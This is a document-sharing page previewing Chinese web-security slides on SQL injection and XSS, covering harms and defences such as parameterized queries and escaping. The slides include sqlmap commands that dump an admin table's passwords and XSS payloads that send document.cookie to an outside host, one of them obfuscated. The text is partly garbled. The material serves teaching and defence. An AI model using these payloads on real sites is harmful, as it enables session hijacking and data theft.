XSS跨站攻击及SQL注入课件_第1页
XSS跨站攻击及SQL注入课件_第2页
XSS跨站攻击及SQL注入课件_第3页
XSS跨站攻击及SQL注入课件_第4页
XSS跨站攻击及SQL注入课件_第5页
已阅读5页,还剩16页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

Web安全性测试安全性测试手段SQL注入漏洞(工具:SqlMap)XSS跨站攻击漏洞CSRF跨站请求伪造DDOS分布式拒绝服务钓鱼点击劫持跨站脚本漏洞,SQL注入原理跨站脚本漏洞分类跨站脚本漏洞及案列漏洞解决方案漏洞的危害SQL注入漏洞

数据库信息泄漏:数据库中存储的用户隐私信息泄露。

网页篡改:通过操作数据库对特定网页进行篡改。网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。服务器被远程控制,被安装后门:经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。

XSS跨站脚本漏洞

钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入,甚至发起基于DHTML更高级的钓鱼攻击方式。网站挂马:跨站后利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。如果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份时,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。XSS蠕虫:XSS

蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施DDoS攻击等。SqlMap实例Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”--tables–D“wepost”/*指定数据库Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-user/*获取当前用户名称Currentuser:‘root@localhost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-db/*获取数据库Currentdatabase:‘wepost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–columns–T“admin”–D“wepost”Sqlmap.py–.hk/article.php?id=276–dbms“Mysql”–dump–c“userid,password”–T“admin”–D“wepost”–v1SQL注入漏洞解决方案输入验证错误消息处理加密处理存储过程来执行所有的查询使用专业的漏洞扫描工具禁止对重要表的Drop、Insert、Update、DeleteSQL注入漏洞解决方案对所有来自用户输入的数据进行严格检查、对数据库配置实用最小权限原则所有查询语句都实用库提供的参数化查询接口,参数化的语句实用参数而不是将用户输入变量嵌入到SQL语句中对进入数据库的特殊字符(“”<>&--;等)进行转义处理或编码转换数据长度严格规定,能防止比较长的SQL注入语句无法正确执行数据层编码统一避免显示SQL错误信息,如类型、字段什么是XSSCrosssitescripting简称XSS原理:利用网站的漏洞向网站的页面注入JAVASCRIPT等脚本内容。根源:程序的输入、输出没有考虑安全因素XSSCheatSheet/xss.html了解不痛浏览器和各种特殊的HTML标签如何执行脚本XSS需要使用的关键字

“:!--<XSS>=&{()}各类伪协议头:

Javascript:vbscript:CSS样式表脚本注入 Style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,1235)))盗取用户cookie信息嵌入恶意代码<XMLID=I>

<X> <C><![CDATA[<imgsrc="javas]]><![CDATA[cript:xx=newImage();xx.src='39/pic/163.asp?url='+escape(document.URL)+'&cookie='+escape(document.cookie);"width=0height=0>]]>

</C>

</X></xml><SPANDATASRC=#IDATAFLD=CDATAFORMATAS=HTML></SPAN>挂马

插入恶意的脚本内容,运行病毒、木马。钓鱼

篡改网页内容,骗取账号、密码等诈骗行为。劫持会话

读取会话Cookie,传送给第三方劫持身份。XSSWorm

使用AJAX技术,做几何趋势的增长传播。非持久型XSS

需要从URL传参,点击链接触发持久型XSS XSS内容已存储到数据库,写到固定页面。DOMXSS JAVASCRIPT处理数据输出出现漏洞

浏览器的漏洞造成的XSS

表单值容易出现XSS

搜索框、信息提示、个人资料、友情链接、北京图片等。

各类表单值、隐藏的表单值都很危险在搜索框中输入“><bodyonload=alert(document.cookie)><“点击搜索课程上图可看到已过滤反斜杠非持久XSS持久XSS分享网站地址”/a.jsp?name=<script>alert(document.cookie)</script>”攻击代码

varimg=newImage();img.src=http://www.XXX.cn/log.jsp?c=“”+document.cookie”””看似前段验证了非法字符,就已经安全了吗?错仍然可以通过GET方法跳过前段/groups/search?keyword=%22%3E3Cbody%20onload=alert(1)%3E%3C%22记录会话模拟登陆劫持会话发送XSS给好友

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论